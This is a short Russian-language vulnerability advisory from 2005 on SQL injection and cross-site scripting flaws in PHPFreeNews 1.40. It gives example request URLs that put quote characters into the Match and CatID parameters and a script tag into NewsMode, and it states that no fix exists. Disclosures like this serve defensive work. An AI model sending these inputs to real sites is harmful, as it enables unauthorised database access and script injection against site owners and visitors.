Дата публикации: | 21.08.2005 |
Всего просмотров: | 1463 |
Опасность: | Средняя |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2005-2637 CVE-2005-2638 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | PHPFreeNews 1.x |
Уязвимые версии: PHPFreeNews 1.40
Описание: Удаленный пользователь может выполнить SQL команды и XSS нападение. SQL инъекция: http://[target]/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&Ca tID=0 http://[target]/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=' http://[target]/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=S earch&CatID=0 http://[target]/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27XSS:
http://[target]/phpfn/NewsCategoryForm.php?NewsMode="><script>alert('Found URL производителя: http://www.phpfreenews.co.uk/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
Ссылки: | PHPFreeNews v1.40 and prior Multiple |